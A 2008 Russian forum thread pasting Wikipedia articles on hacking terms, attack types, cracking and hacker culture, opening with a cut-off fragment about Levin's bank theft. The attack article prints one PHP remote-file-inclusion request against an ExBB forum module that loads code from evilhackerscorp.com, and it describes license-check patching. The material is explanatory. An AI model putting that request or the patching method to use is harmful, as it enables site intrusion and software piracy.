Разумеется, у "Сатурна" был свой счет в банке. Но зачислять на него ворованные деньги мог только безумец. Однако у "сатурновского" бухгалтера Антона Лямина, как помните, был банковский счет в Хельсинки.
В ночь на 30 июня 1994 года Левин перевел первые 143 тысячи долларов со счета Филиппинского национального банка в Гонконге на счет ляминской фирмы "Кармейн пропертиз Лтд." в финском банке "Кансаллис осакепанкки". Доктор Лямин сгонял в Хельсинки, снял эти деньги наличными в (???) и успешно привез их в Петербург. Но Левин из них не получил ни гроша. Друзья сказали ему примерно следующее: "Ты молодец, старик, все получилось о'кей. Но эти деньги мы вложим в наш пивной и прочие бизнесы. Вот когда наварим на них прибыль, тогда и получишь свою долю".
Разумеется, никто не может знат<

Лайфхакер (англ. lifehacker) — человек, который «взламывает», «обманывает» окружающую жизнь, делая ее проще при помощи разных полезных советов и хитрых трюков. Обычно лайфхакер не создает новые методики, а просто владеет существующими. Движение лайфхакеров зародилось в среде компьютерщиков[источник?] (см. Хакер) и получило распространение в 2006 году[источник?].

Термин "лайфхакинг" изобрел еще в 2004 г. британский журналист Дэнни О'Брайен. Он соединил слова life ("жизнь") и hack ("взлом"). В 2006 г. Американское общество по изучению диалектов назвало lifehack одним из самых полезных слов после podcast.

Лайфхакинг по сути является набором полезных и зачастую коротких советов, позволяющих с меньшими затратами и/или более быстро решать различные жизненные и бытовые задачи. К примеру:

* как выкрутить из патрона разбившуюся лампочку;
* как быстрее получить выпивку в переполненном баре;
* как запомнить номер телефона или ПИН-код;
* как меньше стоять в очереди;
* как меньше тратить времени добираясь на работу;
* как быстрее выполнять больше сложных задач;
* как быстро составить план речи;
* как не волноваться перед публикой и пр.
Инструменты и методики лайфхакера

* Смекалка;
* Мнемотехника;
* Ментальные карты;
* Управление временем;
* Разнообразные подборки советов (типа «1000 полезных советов», «Советы туристу», «Советы автолюбителю», «1000 и 1 совет как выжить в незнакомом городе» и т. п.).

Добавлено (31.07.2008, 12:12)
---------------------------------------------
Хакерская атака
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Хакерская атака в узком смысле слова — в настоящее время под словосочетанием понимается «Покушение на систему безопасности», и склоняется скорее к смыслу следующего термина Крэкерская атака. Это произошло из-за искажения смысла самого слова «хакер».

Хакерская атака в широком смысле слова (изначальный смысл) — мозговой штурм, направленный на нахождение пути решения сложных задач. В хакерской атаке могут принимать участие один или несколько высококлассных специалистов (хакеров). В результате мозгового штурма могут быть придуманы нетрадиционные методы решения проблемы, или внесены оптимизирующие корректировки в уже существующие методы.

Крэкерская атака (смотри: cracker в The Jargon File, раздел Glossary) — действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.

Изначально причиной атак послужил ряд ограничений, присущих протоколу TCP/IP. В ранних версиях протокола IP отсутствовали требования безопасности, которые появились только спустя несколько лет. Но только с бурным развитием интернет-коммерции проблема стала актуальной, и пришлось в сжатые сроки внедрять стандарты безопасности.
Mailbombing

Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку легко предотвратить, так как большинство провайдеров имеют хорошие фильтры защиты от рассылки спама. Провайдер может ограничить количество писем от одного отправителя, и такая атака становится неэффективной.

[править] Подбор пароля

Следующий вид атаки тоже прост. Взломщик подбирает пароли к системам ограничения доступа. Ведь вполне очевидно, что пользователи вычислительных систем обычно не в состоянии держать в уме комбинации из букв, цифр и знаков длиной до ста символов. Среднестатистический пароль для доступа к системе обычно не превышает восьми символов, а иногда в качестве пароля вообще используется слово или дата.

При использовании даты всё просто, так как восемь цифр — это всего лишь 108=100 000 000 возможных комбинаций, причём либо первые либо последние 4 цифры обозначают год, и находятся где-то в промежутке между 1900 и 2050. Две другие цифры обозначают месяц, то есть принимают значения от 1 до 12. Оставшиеся цифры принимают значения от 1 до 31 — дни месяца. Здесь же можно исключить даты типа 3102 (31 февраля), так как такие даты используются крайне редко. При отсутствии защиты от перебора паролей подобрать кодовую дату для средней программы не составит труда: при переборе около 100 паролей в секунду (не проблема даже для медленного компьютера) это займет чуть больше одиннадцати суток.

Для фраз всё несколько сложнее, так как если даже взять английский алфавит из 26 букв (русский — 33 буквы), то фраза из восьми символов будет состоять уже из 268=208 827 064 576 вариантов (338=1 406 408 618 241 вариантов для русского языка), что уже в тысячи раз сложнее. Но тут на помощь приходит смекалка: вряд ли пользователь будет запоминать случайные последовательности символов, то есть достаточно перебрать всего лишь все существующие слова в английском словаре, которых там наберется не более 200 000, включая жаргон и редкие слова, а это уже в миллион раз проще. Кроме того, если начать думать ещё внимательнее — большинство горожан, да к тому же работающих в определенной сфере, имеют гораздо меньше слов в своем лексиконе, что снижает количество возможных вариантов ещё на порядок. Также можно принять во внимание, что в качестве паролей могут использоваться имена родственников, домашних животных, названия городов.

Тем не менее, нет никаких оснований расчитывать на столь лёгкий способ получения пароля. В настоящее время большинство пользователей (и тем более системные администраторы коммерческих компаний) используют в качестве пароля случайные последовательности из больших и маленьких латинских символов вперемежку с цифрами. Существует несколько способов создания (и запоминания) надёжного пароля. Например, из первых букв фразы «у лукоморья дуб зелёный, златая цепь на дубе том» получается 9-буквенный пароль улдззцндт, на подбор которого уйдет несколько триллионов попыток.

[править] Вирусы, троянские кони, почтовые черви, снифферы, Rootkit-ы и другие специальные программы

Следующий вид атаки представляет собой более изощренный метод получения доступа к закрытой информации — это использование специальных программ для ведения работы на компьютере жертвы. Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны, поэтому мы не будем рассматривать их в этой статье.

[править] Сетевая разведка

В ходе такой атаки кракер собственно не производит никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.

В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.

[править] Сниффинг пакетов

Также довольно распространенный вид атаки, основанный на работе сетевой карты в режиме promiscuous mode. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению для обработки. В результате злоумышленник может получить большое количество служебной информации: кто откуда куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

[править] IP-спуфинг

Тоже распространенный вид атаки в недостаточно защищённых сетях, когда злоумышленник выдает себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого кракеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений .

[править] Man-in-the-Middle

англ. «Человек посередине». Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне крякер может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.

[править] Инъекция

Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате — получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.

SQL-инъекция — атака, в ходе которой изменяются параметры SQL-запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.

PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости , как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом: GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? . Поэтому важно проверять все готовые решения на наличие уязвимостей. О некоторых из них, а так же о методах защиты можно прочитать статью "Практика безопасного программирования PHP".

Межсайтовый скриптинг или XSS (аббр. от англ. Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже — скрипт-инъекция.

XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.

[править] См. также

* Введение в XPath-инъекции
* Устранение опасности XPath-внедрения

[править] Социальная инженерия

Социальная инженерия (от англ. Social Engineering) — использование некомпетентности, непрофессионализма или небрежности персонала для получения доступа к информации. Этот метод обычно применяется без компьютера, с использованием обычного телефона, почтовой переписки либо кружечки пива. Таким образом обычно получается самая разнообразная информация. В ходе такой атаки крякер устанавливает контакт с жертвой, и, вводя её в заблуждение либо войдя в доверие, пытается получить необходимые сведения, которые сложно получить другим путём, либо другие пути являются более рискованными. Как гласит старая поговорка, «Самое слабое звено системы безопасности — Человек».

[править] Отказ в обслуживании

DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью довести систему жертвы до отказа. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своем коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.

DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.

Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крякера и ценность информации, а так же недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения, и недостаточное внимание к вопросам безопасности в компании в принципе.

Добавлено (31.07.2008, 12:13)
---------------------------------------------
Фрикинг
Материал из Википедии — свободной энциклопедии
(Перенаправлено с Фрикер)
Перейти к: навигация, поиск

Фри́кинг (англ. phreaking) — слэнговое выражение, означающее взлом телефонных автоматов и сетей, обычно с целью получения бесплатных звонков.

Людей, специализирующихся на фрикинге называют фри́керами (англ. phreaker). Это же название применяют к людям, использующим в своих неправомерных действиях телефон с целью оказать психологическое воздействие на конечного абонента.

Добавлено (31.07.2008, 12:14)
---------------------------------------------
Крякер
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Крякер или крэкер (англ. cracker) — человек, занимающийся взломом защиты проприетарных программных средств. Термин компьютерного жаргона. Вне профессиональной среды применяется общий термин «хакер».

Результатом работы крякера являются т. н. кряки и генераторы ключей (в случае ориентации на массового пользователя), или же просто — модифицированная («крэкнутая» или «взломанная») программа с нужной функциональностью.

В абсолютном большинстве случаев крякер не располагает исходным кодом программы, поэтому программа изучается связкой дизассемблера и отладчика, с применением специальных утилит.
Принцип работы крякера

В основе работы хакера лежит исследование ассемблерного кода, полученному из машинных инструкций с помощью специальной программы- дизассемблера. В зависимости от выбранного способа взлома результат исследования может использоваться для построения генератора ключей или для внесения необходимых изменений в исполняемый файл. Последний способ — в большинстве случаев наиболее лёгкий, так как не требует изучения алгоритма проверки правильности ключа: взлом сводится к поиску проверки условия (наподобие ЧислоДляВведённогоКлюча==ЭталонноеЧисло) и замене такого условия на противоположное (то есть для данного примера на ЧислоДляВведённогоКлюча!=ЭталонноеЧисло). Кроме того внесение изменений в исполняемый файл (патч, patch) может производиться с целью отключения напоминаний о необходимости регистрации, сокращения функциональности программы (в этих случаях соответствующие команды процессору заменяются на байты со значением 90 (в 16-ичной системе счисления), что соответствует ассемблерному nop (No Operation), то есть «пустой команде», не выполняющей никаких действий). Возможно также расширение возможностей программы таким способом, но, как правило, это слишком трудоёмкий процесс, не оправдывающий временных затрат (нечто наподобие «классической» возможности «сохраниться» в Сапёре). Между тем, патч возможен лишь в том случае, когда исполняемый файл программы не «запакован» и не защищён специальными «пакерами» и «протекторами» — программами, скрывающими реальный код исполняемого файла. Для последнего типа программ используется самая интеллектуальная часть reverse ingeneering’а — исследование кода программы при помощи отладчика и создание генератора ключей.
Правовые аспекты деятельности

В подавляющем большинстве стран деятельность по взлому программ считается противозаконной (в том числе в России; однако, статус кряков и кейгенов как вредоносного ПО пока не определен). Но дело в том, что факт взлома очень трудно доказать: пользовательское соглашение, как правило, запрещает дизассемблирование программы, а закон — создание и распространение результата работы. Однако, дизассемблированнный текст продукта по окончании работы легко уничтожить, а результат работы — распространить по защищенным каналам и выложить на сервере, хостящемся в стране с более либеральными законами. Используемые же в работе программные продукты, утилиты и различные заготовки не считаются вредоносным ПО (хотя и на них закон пытается наложить руку — см. DMCA). В распространении хакерам помогают и файлообменные сети, поскольку в большинстве из них крайне трудно найти оригинальный источник файла, а уничтожить все его копии и вовсе невозможно.

Добавлено (31.07.2008, 12:14)
---------------------------------------------
Манифест хакера
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Манифест хакера (англ. The Conscience of a Hacker) — текст, написанный 8 января 1986 года. хакером Ллойдом Блэнкеншипом, более известным как Наставник (англ. The Mentor) после его ареста агентами ФБР. Немного позже, этот текст (вскоре ставший программным документом для хакеров всего мира) был включён в седьмой номер электронного журнала Phrack[1]. Автор ярко и красноречиво обозначает основные ценности культуры хакера, а именно: безразличие к цвету кожи, национальности и религии, превосходство знаний и нестандартного образа мыслей, безграничная свобода информации, информации для исследования, изучение из любопытства.

В 1995 году отрывок из Манифеста был зачитан в фильме «Хакеры»; этот отрывок был взят из поздней, не совсем верной редакции из журнала 2600. Также манифест воспроизведён внутри коробки компакт-диска компьютерной игры Uplink.

Добавлено (31.07.2008, 12:15)
---------------------------------------------
Компьютерный терроризм
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Компьютерный терроризм — это область провонарушений, совершаемых людьми, использующих персональный компьютер для преступных целей. В данное время данная отрасль правонарушений очень развита, т.к данный век назван веком высоких технологигий. Развитость инфоиндустрии в разных странах своя, и поэтому можно выявить особые страны, где очаги преступлений связаных с использованием персонального компьютера и интернета довольно велики. Этими странами являются множество Европейских стран, Россия, и конечно Соединённые Штаты Америки. Часто компьютерные преступники создают программы которые наносят определённый вред. К примеру, преступники создают компьютерные программы которые помогают обычным посетителям сети «скачивать» через Интернет новейшие художественные фильмы, музыку и видеоигры. Что наносит многомилионный вред людям, несущий ответственность за эту структуру. Слово «хакер» в значении «компьютерный преступник» употребляется в основном в СМИ, в самой же среде пользователей оно означает «высококвалифицированного программиста». Компании оказываются объектом множества злонамеренных действий. Убытки от производимых хакерами действий масштабны. Подсчет ущерба, который та или иная организация понесла в результате вторжения, порчи информации, вирусной атаки и многих других неприятностей, помогает в выработке годового бюджета защиты. Кроме того, потери, связанные с компьютерными преступлениями, влияют на оборот. Судиться или не судиться? Решение о принятии юридических действий против компьютерного преступника ставит компанию перед необходимостью сделать выбор между рассмотрением дела в гражданском суде и уголовным преследованием. И то и другое имеет свои плюсы и минусы.

Сколько же получают хакеры от «третьих лиц»? ответ на данный вопрос довольно объёмен. Во-первых, человек который «заказывает» данный вид «работы» ясно понимает, что если правоохранительные органы когда-нибудь его поймают, просто мелким штрафом здесь не ограничется. Поэтому данный вид преступной деятельности развивается, ведь для хакеров, такой вид «заработка» остаётся единственной прибылью в жизни.

Добавлено (31.07.2008, 12:15)
---------------------------------------------
The Hacker's Handbook
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Руководство Хакера (The Hacker’s Handbook) является легендарной книгой научной литературы с 1980-х, эффективно объясняя, как компьютерные системы периода были взломаны. Издание содержит искренние и личные комментарии от британского автора книги, Хьюго Корнваля, псевдоним Питера Соммера, который является теперь «Товарищем Исследования в Информационной Безопасности Систем» в Лондонской Школе Экономики и часто появляется в британских судах как эксперт по цифровому свидетельству и компьютерным освидетельствованиям, ученому мужу СМИ и автору топиков по компьютерной безпастности. Книга была возможно самая популярная из-за содержания в ней актуальных приемов взлома существующих систем (хотя конфиденциальные детали, типа паролей, были закрашены черной краской).

Первый выпуск, который является версией, наиболее легко доступной для загрузки, был издан в 1985, и последние из четырех выпусков (отредактированный Стивом Голдом) появились в 1989. В 1990 британский Парламент издал Компьютерный закон о Неправильном употреблении, и публикация дальнейших выпусков вероятно будет подстрекательством того, чтобы совершить преступление согласно тому закону. Хьюго Корнваль / Питер Соммер сказал недавно: «Это было книгой того времени, сейчас это любопытство. Хак в те дни был действительно „исследованием сети“ и не имел никакой злонамеренной коннотации. Демография онлайн сообщества изменилась по прошествии 20 лет».

Добавлено (31.07.2008, 12:16)
---------------------------------------------
Хакерская ценность
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Ха́керская це́нность — представление (мнение) хакеров о некотором предмете (процессе, занятии) как об интересном и/или достойном.

Совершить что-нибудь такое, что остальным кажется сложным или невозможным, или решить какую-либо проблему таким способом, в котором проявляется утончённость, сообразительность, ум, блестящие способности — такое решение обладает хакерской ценностью. Важной частью этого понятия является также созидательность. Например, вскрытие сложного замка́ при помощи отмычки обладает хакерской ценностью, а взлом его тяжёлой кувалдой — не обладает.

Понятие о хакерской ценности часто приводится в качестве побудительной причины для расходования усилий, направленных на достижение такой цели, которая кажется бесполезной, но обладает хакерской ценностью. Например, в компьютерном языке MacLISP существовала поддержка ввода и вывода чисел, записанных римскими цифрами, реализованная исключительно ради её хакерской ценности.

В настоящее время наблюдается тенденция использования терминов «хакер» и «хакерская ценность» исключительно в негативных значениях, а именно в значениях «взломщик» и «вандал», что неверно.